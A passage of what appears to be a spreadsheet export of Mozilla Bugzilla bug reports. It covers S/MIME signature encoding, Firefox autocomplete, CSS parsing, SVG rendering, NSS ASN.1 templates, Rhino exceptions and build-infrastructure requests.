Content-Type: application/x-pkcs7-signature name=smime.p7s
Content-Transfer-Encoding: base64
Content-Disposition: attachment filename=smime.p7s
Content-Description: S/MIME Cryptographic Signature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--------------ms010801010701090101020501--
The signature is invalid because the quoted printable data will be verified - 
not the 8bit data - 8bit data cannot be signed - only 7bit data can be signed 
and verified.
This BUG has been verified on multiple platforms (WinXP Linux Suse 9.1 MAC 
OSX).
This BUG consists of TWO problems :
1. YOU MUST always reencode the message to 7bit/quoted printable PRIOR signing 
as stated in RFC 2633
3.1.3 Transfer Encoding for Signing Using multipart/signed
   If a multipart/signed entity is EVER to be transmitted over the
   standard Internet SMTP infrastructure or other transport that is
   constrained to 7-bit text it MUST have transfer encoding applied so
   that it is represented as 7-bit text. MIME entities that are 7-bit
   data already need no transfer encoding. Entities such as 8-bit text
   and binary data can be encoded with quoted-printable or base-64
   transfer encoding.
2. For verifying mails have to be ALWAYS encoded back to 7bit/quoted printable 
PRIOR verifying - theoretically - the mail within my sent folder (8bit signed) 
should be INVALID but it is not - because you do not canonicalize the data 
before verifying which is an RFC violation too.
SOLUTION :
IF the mail is 8bit reencode it to 7bit/quoted printable before you sign.
IF a signed mail is 8bit reencode it to 7bit/quoted printable before you 
verify.
Reproducible: Always
Steps to Reproduce:
Deactivated the setting -&gt; Edit-&gt;Preference-&gt;Mail &amp; 
Newsgroups-&gt;Composition-&gt;For Messages that contain 8bit characters use 'quoted 
printable' MIME encoding and sign an email with smime using 8bit characters (i.
e. german umlauts)
Actual Results:  
Invalid signature on recieving clients and (also mozilla or any other for that 
matter)
Expected Results:  
Reencode Message to quoted printable/7bit prior signing</t>
  </si>
  <si>
    <t>r.gawanka</t>
  </si>
  <si>
    <t>FIREFOX-234734</t>
  </si>
  <si>
    <t>can't select autocomplete result with mouse only keyboard</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20040217 Firefox/0.8.0+ (scragz)
see below also see URL for some comments
Reproducible: Always
Steps to Reproduce:
1.Search for something on google
2.return to google homepage
3.type the first few letters of your previous search and try to click on
autocomplete result that comes up with left mouse button
Actual Results:  
does not autocomplete the entry when using muose only when using keyboard
produces an error in JS console:
Error: uncaught exception: [Exception... Cannot modify properties of a
WrappedNative  nsresult: 0x80570034 (NS_ERROR_XPC_CANT_MODIFY_PROP_ON_WN) 
location: JS frame :: chrome://global/content/bindings/autocomplete.xml ::
onPopupClick :: line 604  data: no]
Expected Results:  
should've autocomplete'd the entry</t>
  </si>
  <si>
    <t>berkut.bugzilla</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-241545</t>
  </si>
  <si>
    <t>flirtseiten-vergleich.de - no match while parsing a numerical class label name (starts with a number)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.7b) Gecko/20040421
Most of the text on http://www.flirtseiten-vergleich.de/ should be CSS-Formated
but it isn't in all mozilla &amp; firefox browsers i've seen so far (up to Mozilla
1.7RC1 now)
There are class-labels starting with a number (class=10pxw ...)
Reproducible: Always
Steps to Reproduce:
run http://www.flirtseiten-vergleich.de/
or try this little code fragment:
test.css:
.10s {
	font-family: Arial
	font-size: 10px
	color: #3366FF
}
test.html:
        bla
Actual Results:  
Text (most of the page or in the small example bla) is not CSS-formated
Expected Results:  
do a better class-label match
- Allow numbers at the beginning
  CSS label: .10s should matcht class=10s
- Perhaps also allow (like  Internet Explorer) some stupid formations like:
  CSS label: ..test matching class=test
  CSS label: .kl..sdjf.test matching class=test
  ...</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-137572</t>
  </si>
  <si>
    <t>Pitchforkmedia.com - render incorrectly css is seemingly ingored</t>
  </si>
  <si>
    <t>I had submitted a bug a while back on this topic but I guess it was resolved
since I can't find it when I search for bugs I'ved submitted.
Since Pitchforkmedia.com recently revamped their site and since it is still
rendering completely incorrectly in Mozilla (0.9.9 - 2002031104 Win98) I'm
submitting a bug.
A lot of it seems to be css related...
in index.html we see
And looking through style.css we see some pretty simple stuff.  For example:
A:link { color: BLACK text-decoration: none }
And yet on the main page of the site it is very clear that every link is blue
and clearly underlined.
in div.bluebox we see that all of the separate text boxes around information on
the main page (news reviews interviews etc) are supposed to contain amongst
other features a 1px black border.  And sure enough there is no such black
border on the front page.
Other small annoyances that I can't pinpoint to specific css without spending a
bit more time looking it over include the gaps between the images for news 
reviews etc. on the main page and the block of text they represent.
I fooled around with NS4 and this page last night and while it wasn't getting
the css perfect it was at least making the links BLACK which I think is
definately better than how Mozilla 0.9.9 is handling this page.  IE5 and IE6
render this page as it is intended (so I imagine this page was made with that
browser in mind) but I can't figure out why all the css is being ignored.
Hopefully I didn't miss something obvious and this is simply a mistake on their
part and this will just get filed into evangelism...</t>
  </si>
  <si>
    <t>FIREFOX-504389</t>
  </si>
  <si>
    <t>Sync</t>
  </si>
  <si>
    <t>Don't automatically sync after clicking on wipe server</t>
  </si>
  <si>
    <t>thunder suggests that we just let the user manually sync if s/he wants to.</t>
  </si>
  <si>
    <t>SEAMONKEY-517139</t>
  </si>
  <si>
    <t>Port  Bug 497730 [Restore session from crash while loading multiple tabs opens multiple about:blanks] to SeaMonkey</t>
  </si>
  <si>
    <t>Created attachment 401164
fix
[Checkin: Comment 1]
From parent bug:
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b99)
Gecko/20090605 Firefox/3.5b99
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b99) Gecko/20090605
Firefox/3.5b99
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b99) Gecko/20090605
Firefox/3.5b99
STR:
1. Start with a single tab open to the home page
2. Install Ted's Crashme extension
(http://crashme.googlecode.com/files/crashme-advanced.xpi)
3. Restart Firefox
4. CTLR/Command + Click on the Latest Headlines bookmark
5. Opt to open in multiple tabs
6. Make sure a couple of the tabs have the page title while others still say
Loading
7. Crash Firefox
8. Restart Firefox and restore the session if prompted to do so
RESULT:
Tabs which already had the page title are loaded.  All other tabs show up as
about:blank.
EXPECTED:
about:blank tabs should remember the URL they were attempting to load and try
to reload them.</t>
  </si>
  <si>
    <t>misak.bugzilla</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-293301</t>
  </si>
  <si>
    <t>since 20050430: [Mac] rendering of text in non-western encodings is broken</t>
  </si>
  <si>
    <t>Starting from 20050430 rendering of text in non-western encodings is broken.
My non-default font prefs are:
user_pref(font.default.x-western sans-serif)
user_pref(font.name.sans-serif.he Arial)
user_pref(font.name.sans-serif.x-western Arial)
user_pref(font.name.serif.x-western Lucida Grande)
(Note: I'm using the Windows version of Arial)</t>
  </si>
  <si>
    <t>BUGZILLA-168804</t>
  </si>
  <si>
    <t>Document CheckCanChangeField so sites can modify it for local needs</t>
  </si>
  <si>
    <t>The function CheckCanChangeField in process_bug.cgi defines who can change what.
Lots of sites want to tweak the default Bugzilla policy in small ways and
editing this function is the easiest way currently. We should document that
function better and make it more clear how it works so this is easier for
admins to do.
Gerv</t>
  </si>
  <si>
    <t>CORE-34242</t>
  </si>
  <si>
    <t>X font lookups on -*-*-*-*-*-*-*-*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>I was looking through X font handling code and came upon the gtkfotnsel package
which had a very interesting comment that some X servers will add extra font
names to a reply to XListFonts (-*-*-*-*-*-*-*-*-*-*-*-*-*-*)  rather than to
XlistFonts (-*). This is true for Linux and XFree86.
On my machine  xlsfonts -fn '-*-*-*-*-*-*-*-*-*-*-*-*-*-*' returns 2623 lines
but xlsfonts -fn '-*' return 1777. Most if not all of the extra lines seem to
be partially qualified forms of scalable fonts i.e. it's replacing some of the
'0's. More important the second form is significantly faster.
This suggests that a patch like:
Index: mozilla/gfx/src/gtk/nsFontMetricsGTK.cpp
===================================================================
RCS file: /cvsroot/mozilla/gfx/src/gtk/nsFontMetricsGTK.cppv
retrieving revision 1.81
diff -u -r1.81 nsFontMetricsGTK.cpp
--- mozilla/gfx/src/gtk/nsFontMetricsGTK.cpp    2000/03/27 00:10:29     1.81
+++ mozilla/gfx/src/gtk/nsFontMetricsGTK.cpp    2000/04/02 16:02:48
@@ -25967 +25967 @@
    */
   if (!gGotAllFontNames) {
     gGotAllFontNames = 1
-    GetFontNames(-*-*-*-*-*-*-*-*-*-*-*-*-*-*)
+    GetFontNames(-*)
   }
   PL_HashTableEnumerateEntries(gFamilies SearchFamily 
@@ -26427 +26427 @@
   if (!gGotAllFontNames) {
     gGotAllFontNames = 1
-    GetFontNames(-*-*-*-*-*-*-*-*-*-*-*-*-*-*)
+    GetFontNames(-*)
   }
   return 1
may be a performance win.
However trimming all the other wildcard strings to their shortest values may
not be a good idea because at leat one font server xfstt has trouble with a
string like '-*-arial-*' as opposed to '-*-arial-*-*-*-*-*-*-*-*-*-*-*-*'.
I suppose this is some kind of X feature but I have no idea what that is.</t>
  </si>
  <si>
    <t>CORE-86372</t>
  </si>
  <si>
    <t>Problems when changing the text inside a TEXTAREA using DOM-1</t>
  </si>
  <si>
    <t>Basically the problem is that the DOM-0 (forms[0].elements[0].value) does not
see the same thing like the DOM-1 (document.getElementsByTagName
(textarea).items(0).childNodes.item(0).nodeValue).
While the DOM-0 can see the text that is in the source code and can also see 
the text written by the user it cannot see text added by a DOM-1 procedure.
While the DOM-1 can add text to the tree and see it it doesn't see text 
written by the user.
This different interpretation leads to the following situation:
- if you type in some text and afterwards add another text using the DOM-1 
both texts are overlapping. Same if you first add using DOM-1 and then type in
some text.
- if you have no text written and add some using DOM-1 you cannot select it.
it is virtually inexistent. You can only see the text displayed but it's not
there for normal use.</t>
  </si>
  <si>
    <t>Erich.Iseli</t>
  </si>
  <si>
    <t>CORE-116252</t>
  </si>
  <si>
    <t>Hang on DHTML Examples</t>
  </si>
  <si>
    <t>Using build 2001121903 on win2k get's a hang on the URL
http://www.dynamic-core.net/widgetx/examples/blobs.htm
Some kind of regression it seems ...</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-435289</t>
  </si>
  <si>
    <t>Create two new linux VMs from CentOS-5.0-ref-tools-vm</t>
  </si>
  <si>
    <t>Can you please create two new linux VMs called:
fx-linux-1.9-slave03.build.mozilla.org
fx-linux-1.9-slave04.build.mozilla.org
With the usual three disks 9.7gb/20gb/15gb</t>
  </si>
  <si>
    <t>WEBSITES-789381</t>
  </si>
  <si>
    <t>other.mozilla.org</t>
  </si>
  <si>
    <t>Firefox 15.0.1 Release notes not showing on http://www.mozilla.org/en-US/firefox/releases/</t>
  </si>
  <si>
    <t>http://www.mozilla.org/en-US/firefox/releases/ doesn't seem to have the latest release notes link for 15.0.1.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-210694</t>
  </si>
  <si>
    <t>build warnings in nsImapProtocol.cpp</t>
  </si>
  <si>
    <t>When I build nsImapProtocol.cpp on my gcc on Win32:
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp: In member function
   `void nsImapProtocol::ProcessSelectedStateURL()':
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp:1949: warning: unused
   variable `const char*hostName'
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp: In member function
   `virtual void nsImapProtocol::NormalMessageEndDownload()':
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp:3376: warning: compariso
n
   between signed and unsigned integer expressions
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp: In member function
   `PRBool nsImapProtocol::CheckNeeded()':
c:/mozilla/mozilla/mailnews/imap/src/nsImapProtocol.cpp:7347: warning: compariso
n
   between signed and unsigned integer expressions
20030623</t>
  </si>
  <si>
    <t>NSS-233586</t>
  </si>
  <si>
    <t>EDIPartyName should be CONSTRUCTED (probably X400AddressName also)</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.2.1) Gecko/20030711
CERT_DecodeGeneralName fails if generalName is EDIPartyName.
Specifically the first call to sec_asn1d_confirm_identifier() fails
because the template has set expect_tag_modifiers to 0x80 while the
found_tag_modifiers are 0xa0.
Within the context of GeneralName EDIPartyName is an implicitly tagged
SEQUENCE. ASN.1 dictates that implicitly tagged types are primitive or
constructed depending on the underlying type. Since the underlying type
is SEQUENCE in this case the implictly tagged type should be constructed.
I think CERT_EDIPartyNameTemplate needs to have SEC_ASN1_CONSTRUCTED included
in its kind so that it expects 0xa0 and not 0x80 for tag_modifiers.
[and it continues to expect 0x05 as the tag_number of course]
I have not tried the X400Address but I suspect it has exactly the same
issue since it is also an implicitly tagged SEQUENCE and its template
does not have SEC_ASN1_CONSTRUCTED as part of its kind.
I took a look at:
http://www.opensource.apple.com/darwinsource/10.3/SecurityNssAsn1-11/nssDER/Source/nameTemplates.cpp
and it has both EDIPartyName and X400Address marked as CONSTRUCTED.
I also looked at the test certs that can be gotten to from
http://csrc.nist.gov/pki/testing/x509paths.html
and I couldn't see any obvious test cases which used EDIPartyName
or X400Address.
Reproducible: Always
Steps to Reproduce:
1.Create a certificate with a subjectAlternativeName of type ediPartyName
2.Read in the cert file and decode the DER bytes into a CERTCertificate
3.Call CERT_GetCertificateNames on the CERTCertificate
Actual Results:  
CERT_GetCertificateNames returns NULL.
Expected Results:  
CERT_GetCertificateNames should have returned a CERTGeneralName with
type = ediPartyName and with the name.other field filled
with a SECItem representing the EDIPartyName.</t>
  </si>
  <si>
    <t>yassir.elley</t>
  </si>
  <si>
    <t>CORE-353276</t>
  </si>
  <si>
    <t>path stroke-width=0 does not display fill</t>
  </si>
  <si>
    <t>stroke-width=0 is being interpreted as don't display element.
whereas it should mean dont display stroke.
this bug may be cairo related.
this bug has only appeared in recent builds
win'98 ff 1.5 and earlier did not have this bug</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-522845</t>
  </si>
  <si>
    <t>Cleanup out-of-sync copies of ref images</t>
  </si>
  <si>
    <t>While setting up new slaves this week we hit problems where some of the slaves were slightly different to what we expected. 
1) At least one of the refimages used this week has production (not staging) ssh keys on it. We're not sure how this happened but this needs to be fixed as a new unverified slave should not be able to access production systems. (Also this caused last night's testing to fail out in staging because of mismatched keys.)
2) There have been a series of recent changes to ref images for puppet/opsi. Not all of these showed up as expected. Its unclear which ref images have which of these changes.
From talking with Phong it seems there are different copies of the refimages being used for cloning. Phong correct me if I missed anything but as best as I can remember you said there are:
2 x xp talos ref image
2 x vista talos ref image
2 x 10.4 talos ref image
2 x 10.5 talos ref image
2 x 10.5 build/unittest mini ref image
1 x 10.5 build/unittest xserve ref image
1 x linux talos ref image
Phong: 
1) for the refimages where there are multiple copies can you diff to see which ones have out-of-sync versions? If they are identical copies can you bring one online? If you find any diff can you bring *both* online so we can login to both machines figure out whats going on and try to detangle the differences?
2) for any refimages where there is only one copy can you bring it online so we can verify what keys are installed?</t>
  </si>
  <si>
    <t>CORE-196337</t>
  </si>
  <si>
    <t>Mozilla crashes on startup with user_pref(nglayout.debug.disable_xul_cache false) presenting in prefs.js</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4a) Gecko/20030307
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4a) Gecko/20030307
If the user_pref(nglayout.debug.disable_xul_cache false) string presents in
prefs.js file mozilla crashes on start up. And if i look through the prefernces
without changing and click OK button mozilla crashes also with adding this
string into prefs.js. 
Reproducible: Always
Steps to Reproduce:
1. See preferences wiht opening debug group
2. Click OK button
3. Or add this string into the prefs.js file
Actual Results:  
CRASH !!!
Expected Results:  
:)</t>
  </si>
  <si>
    <t>asherman</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-334730</t>
  </si>
  <si>
    <t>cairo correctness clean up: Unix</t>
  </si>
  <si>
    <t>BUGZILLA-166318</t>
  </si>
  <si>
    <t>Bugzilla::Config should check for defparams.pl failure</t>
  </si>
  <si>
    <t>If defparams.pl is buggy then Bugzilla::Config ignores the failures leading to
removal of all params (because they're all consdiered obsolete)
Error checking coming up</t>
  </si>
  <si>
    <t>CORE-469683</t>
  </si>
  <si>
    <t>Wrong context menu transparency</t>
  </si>
  <si>
    <t>Created attachment 353052
patch v1
Since bug 391984 popup menu transparency is no longer implemented using -[NSWindow setAlphaValue:] instead we now make the window translucent and let -moz-appearance: menupopup / menuitem manage the transparency.
However since the menuitems draw on top of the menupopup their opacity gets multiplied. That means that the popup is now more transparent under the top and bottom padding than under the menuitems.
This patch adds a CGContextClearRect when drawing menuitems as suggested in bug 391984 comment 5. This avoids the multiplying opacity problem.
Furthermore I'm removing the popup window alpha stuff because we don't need it any more.</t>
  </si>
  <si>
    <t>mstange</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-292324</t>
  </si>
  <si>
    <t>ArrayIndexOutOfBoundsException while compiling a script</t>
  </si>
  <si>
    <t>User-Agent:       Opera/8.0 (Windows NT 5.0 U en)
Build Identifier: 
An attempt to compile the attached script will throw an 
ArrayIndexOutOfBoundsException in the interpreter. 
Reproducible: Always
Steps to Reproduce:
1. Paste the attached function definition into a Rhino console (you might have 
to do it twice as first time it will complain java.io.IOException: Not enough 
storage is available to process this command - ignore it and paste the 
function code once more)
2.
3.
Actual Results:  
Exception in thread main java.lang.ArrayIndexOutOfBoundsException: 1024
        at org.mozilla.javascript.Interpreter.recordJump(Interpreter.java:1524)
        at org.mozilla.javascript.Interpreter.addGoto(Interpreter.java:1456)
        at org.mozilla.javascript.Interpreter.visitStatement(Interpreter.java:
719)
        at org.mozilla.javascript.Interpreter.visitStatement(Interpreter.java:
652)
        at org.mozilla.javascript.Interpreter.visitStatement(Interpreter.java:
673)
        at org.mozilla.javascript.Interpreter.visitStatement(Interpreter.java:
652)
        at org.mozilla.javascript.Interpreter.generateICodeFromTree(Interpreter.
java:502)
        at org.mozilla.javascript.Interpreter.generateFunctionICode(Interpreter.
java:493)
        at org.mozilla.javascript.Interpreter.
generateNestedFunctions(Interpreter.java:577)
        at org.mozilla.javascript.Interpreter.generateICodeFromTree(Interpreter.
java:498)
        at org.mozilla.javascript.Interpreter.compile(Interpreter.java:455)
        at org.mozilla.javascript.Context.compileImpl(Context.java:2220)
        at org.mozilla.javascript.Context.compileString(Context.java:1284)
        at org.mozilla.javascript.Context.compileString(Context.java:1273)
        at org.mozilla.javascript.Context.evaluateString(Context.java:1129)
        at org.mozilla.javascript.tools.shell.Main.evaluateScript(Main.java:453)
        at org.mozilla.javascript.tools.shell.Main.processSource(Main.java:341)
        at org.mozilla.javascript.tools.shell.Main.processFiles(Main.java:160)
        at org.mozilla.javascript.tools.shell.Main$IProxy.run(Main.java:83)
        at org.mozilla.javascript.Context.call(Context.java:528)
        at org.mozilla.javascript.ContextFactory.call(ContextFactory.java:414)
        at org.mozilla.javascript.tools.shell.Main.exec(Main.java:140)
        at org.mozilla.javascript.tools.shell.Main.main(Main.java:112)
Expected Results:  
Should have silently compiled the function.</t>
  </si>
  <si>
    <t>CORE-307438</t>
  </si>
  <si>
    <t>prefread.cpp doesn't support \u escape sequences</t>
  </si>
  <si>
    <t>prefread.cpp doesn't support \u escape sequences
it'd be nice if it did.  see for example bug 301694.</t>
  </si>
  <si>
    <t>CORE-353306</t>
  </si>
  <si>
    <t>Can't type into editable menulists</t>
  </si>
  <si>
    <t>Steps to reproduce problem:
1. Open Composer
2. In the status bar right click  and select Advanced Properties
3. Try to type a new attribute
Expected results: new attribute typed in
Actual result: menu autocompletes attribute</t>
  </si>
  <si>
    <t>JSS-314098</t>
  </si>
  <si>
    <t>getProvider().toString() returns Mozilla-JSS version 3.3 in JSS 4.x</t>
  </si>
  <si>
    <t>When printing getProvider().toString() JSS 4.x returns Mozilla-JSS version 3.3 which is incorrect.  Here is Wan-Teh's response.
This version number is specified in org/mozilla/jss/JSSProvider.java.
It was initially set to 3.2 in JSS_3_2_RTM (the first JSS release
with a JCE provider) and only updated once to 3.3 in JSS_3_3_RTM.
This is another file that needs to be updated for each new JSS
release.
Note that the version is specified as a double so we may not
be able to say 4.1.1.  One option is to use 4.11 to mean 4.1.1
but if we ever release JSS 4.11 (NSS is already at 3.11 so this
is possible) we won't be able to express that.</t>
  </si>
  <si>
    <t>Sandeep.Konchady</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-403785</t>
  </si>
  <si>
    <t>Several string changes in toolkit and security</t>
  </si>
  <si>
    <t>German L10n changes for Bug 401954 bug 401958 bug 400617 bug 223895 bug 400327 - patch upcoming.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-206731</t>
  </si>
  <si>
    <t>saur-wbi.de - javascript buttons do not work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.4b) Gecko/20030508
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.4b) Gecko/20030508
the entire page doesnt work because the buttons on left side doesn't work
Reproducible: Always
Steps to Reproduce:
1.url
2.choice language -&gt; new window
3.press buttons on left side (f.i. Biographical search oder Exit)
Actual Results:  
nothing
Expected Results:  
look at Netscape 4</t>
  </si>
  <si>
    <t>toms_mozilla</t>
  </si>
  <si>
    <t>CORE-264380</t>
  </si>
  <si>
    <t>implement SVGTextContentElement.getComputedTextLength</t>
  </si>
  <si>
    <t>TOOLKIT-384206</t>
  </si>
  <si>
    <t>[10.5] breakpad fails to build</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-453237</t>
  </si>
  <si>
    <t>Support import of iCab 4 bookmarks</t>
  </si>
  <si>
    <t>We currently support the import of iCab 1-2 and iCab 3 bookmarks (same file format different file names) but iCab 4 brings a new plist format and file location.
At some point we should support the import of this new format (which lives in ~/Library/Preferences/iCab/iCab 4 Bookmarks).
Sample default iCab 4 bookmarks in the URL field.</t>
  </si>
  <si>
    <t>BUGZILLA-273519</t>
  </si>
  <si>
    <t>The bz-devel ENTITY is not valid XML</t>
  </si>
  <si>
    <t>As pointed out in bug 265995 the use of and entity to exclude certain text is
not valid in XML (which means it's also not part of the DocBook 4 spec). I'm
rather attached to it so removing it is something I'm reluctant to do.</t>
  </si>
  <si>
    <t>SEAMONKEY-470792</t>
  </si>
  <si>
    <t>help.xul has a wrapper vbox that prevents the toolbar to be unified</t>
  </si>
  <si>
    <t>toolkit/themes/pinstripe/global/toolbar.css:
------------------------------------------------
.toolbar-primary
window &gt; toolbox:nth-of-type(1) &gt; toolbar:nth-of-type(1) {
-moz-appearance: -moz-mac-unified-toolbar
}
help.xul:
------------------------------------------------
I could be wrong but I can't see any reason for the vbox.</t>
  </si>
  <si>
    <t>CORE-103662</t>
  </si>
  <si>
    <t>Allow wide concatenation of defined string constants</t>
  </si>
  <si>
    <t>It is not possible to compile time concatenate defined string if you want them 
in a wide flavour. jag found something out in bug 89742:
&gt; I remember someone stating that NS_LITERAL_STRING(FOO) works because the
&gt; preprocessor needs to resolve |FOO| before handing it to NS_L (see the #define
&gt; for NS_LITERAL_STRING in nsLiteralString.h) so we could do something similar
&gt; for NS_L (#define NS_L(s) NS_L_IMPL(s) #define NS_L_IMPL L##s).
&gt; Could you quickly test that by adding this define to nsBookmarksService.cpp:
&gt; #define NS_LL(s) NS_L(s)
&gt; and then using NS_MULTILINE_LITERAL_STRING(NS_LL(NC_BOOKMARKSROOT) 
&gt; NS_LL(#$))
... and it worked (compiled)</t>
  </si>
  <si>
    <t>bratell</t>
  </si>
  <si>
    <t>CORE-76898</t>
  </si>
  <si>
    <t>add minimal logging to nsDocShell</t>
  </si>
  <si>
    <t>I've added some minimal NSPR logging to nsDocShell that might be useful to other 
people. Whatdya think?</t>
  </si>
  <si>
    <t>CORE-254254</t>
  </si>
  <si>
    <t>DIV border overlaps content when DIV is dynamically resized</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 
Connected with bug report 151181
See also http://forums.mozillazine.org/viewtopic.php?t=108567
If you have two nested DIVs both with borders. The inner DIV contains a P with 
sometext.  If you dynamically resize the outer DIV the inner DIV border is 
resized so that it overlaps its contents.
Reproducible: Always
Steps to Reproduce:
1.  Create an Outer DIV with width set and overflow hidden or auto.
2.  Create an Inner DIV with a border set.
3.  Insert into the Inner DIV a P with lots of text and white-space:nowrap or 
alternatively a P with a border and width set.
4.  Dyamically resize the outer DIV so that its width is less than the width of 
the P contained in the Inner DIV.
Actual Results:  
Inner DIV border overlaps child P text.
Expected Results:  
Presumably Inner DIV border should not change - as in IE.</t>
  </si>
  <si>
    <t>juliant</t>
  </si>
  <si>
    <t>BUGZILLA-160096</t>
  </si>
  <si>
    <t>Msg A legal component ... due to use of international chars in component name</t>
  </si>
  <si>
    <t>Steps to reproduce
==================
Create a product
Create a component - use some international characters like PÃ¸ihlaÅ¡ovÃ¡nÃ­ 
uÅ¾ivatelÃ¹
Create a bug for the product and component (I had this done in previous version 
2.14 already the problem may apeare here probably)
Edit the bug (add some comments) and submit. Keep the component as is
Ezpected
========
All international characters will appeare correctly
Submit will succeed.
Observed
========
Some international characters were shown incorrectly
Submit failed with message A legal component must be selected
Reason
======
All HTML pages miss encoding information and when browser selects some 
default it is sometime incorrect.
Solution
========
Edit header.html.tmpl and add line into HTML header with encoding (I used 
windows-1250)
Remaining topics to solve
=========================
It would be advisable to have parameter for Bugzilla to specify what encoding 
is to be used.
I will create a bug (enhancment) for sending e-mails.</t>
  </si>
  <si>
    <t>jan.vlcinsky</t>
  </si>
  <si>
    <t>MOZILLA.ORG-458372</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Hannes Wallnoefer </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Build Identifier: 
I would like to obtain CVS write access for the Rhino CVS repository. I am working full-time on a Rhino based project and have contributed several patches to the project over the last years.
Reproducible: Always</t>
  </si>
  <si>
    <t>hannesw</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-450307</t>
  </si>
  <si>
    <t>Please do an svn update of mozillamessaging.com (page broken)</t>
  </si>
  <si>
    <t>The current page has two problems:
1) the link to the downloads dont' work
2) there were no links to the l10n locales.
The current production tip has that fixed.
thanks.</t>
  </si>
  <si>
    <t>davida</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLAMESSAGING.COM_GRAVEYARD-530133</t>
  </si>
  <si>
    <t>Knowledge Base Articles</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLAMESSAGING.COM_GRAVEYARD</t>
  </si>
  <si>
    <t>KB article: Moving from Thunderbird 2 to 3</t>
  </si>
  <si>
    <t>Overview for users moving from Thunderbird 2 to 3</t>
  </si>
  <si>
    <t>rtanglao</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-369524</t>
  </si>
  <si>
    <t>Make fallback code look at accept_lang</t>
  </si>
  <si>
    <t>Right now prefetch.php looks at $_SERVER['HTTP_ACCEPT_LANGUAGE'] if the user hasn't specified a language in the URL.  If they have but that language isn't available for that particular page it falls back to $default_lang.
It should merge walk through the accept-lang header first and use $default_lang as a last resort.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-490509</t>
  </si>
  <si>
    <t>Website: Long usernames cause overlap on the featured designer module</t>
  </si>
  <si>
    <t>current featured designer is COMMONGROUNDFOUNDATION. It overlaps the View Designer link. Not crucial as both links go to the same place but it's a bit ugly.</t>
  </si>
  <si>
    <t>CORE-426546</t>
  </si>
  <si>
    <t>Investigate why the mochitest for bug 392746 is failing on linux (and try to fix it)</t>
  </si>
  <si>
    <t>The mochitest for bug 392746 was disabled for Linux because it failed on the Linux tinderbox.
I guess it's failing there because the wrong text is being selected or something.
Anyhow this needs to be investigated and fixed so that this test also works on Linux.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-435341</t>
  </si>
  <si>
    <t>Weave should sync on browser shutdown</t>
  </si>
  <si>
    <t>Weave should sync on browser shutdown.  Ideally it should be able to abort a currently-executing sync if the user really wants to quit but since Weave can't currently be cancelled we should display a modal progress dialog telling them to wait.</t>
  </si>
  <si>
    <t>avarma</t>
  </si>
  <si>
    <t>SEAMONKEY-321578</t>
  </si>
  <si>
    <t>Files dragged onto tabbar from explorer don't open in new tabs anymore</t>
  </si>
  <si>
    <t>I always open lots of files in SeaMonkey by dragging them over onto an empty part of the tabbar directly from Explorer. Especially my photography workflow depends completely on this behaviour as I do the first comparison of similars by quickly dragging them over to the browser to appear in tabs side by side.
Starting - presumably - with the tab reordering implementation this doesn't work anymore and instead new files are opened in the current tab. Highly annoying for the photography workflow - now I need to insert ctrl-t in between the drags - and potentially destructive dataloss if you drag a file over while the current tab contains formdata.
If tab reordering isn't responsible and it's unknown when this bug was introduced let me know and I'll track down the regression window. I care a lot about this.</t>
  </si>
  <si>
    <t>svl-bmo</t>
  </si>
  <si>
    <t>CORE-386226</t>
  </si>
  <si>
    <t>find a way to always release cached drag data as soon as possible</t>
  </si>
  <si>
    <t>We cache drag data for every drag the originates within Gecko. We attempt to release it when EndDragSession is called but EndDragSession isn't called very often at the end of drags for some reason. This means that we often end up holding onto the cached data until the next drag the originates in Gecko.
It may even be possible that a drag originating in gecko before a drag coming into gecko from another source will have its data override the new data coming in.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-368583</t>
  </si>
  <si>
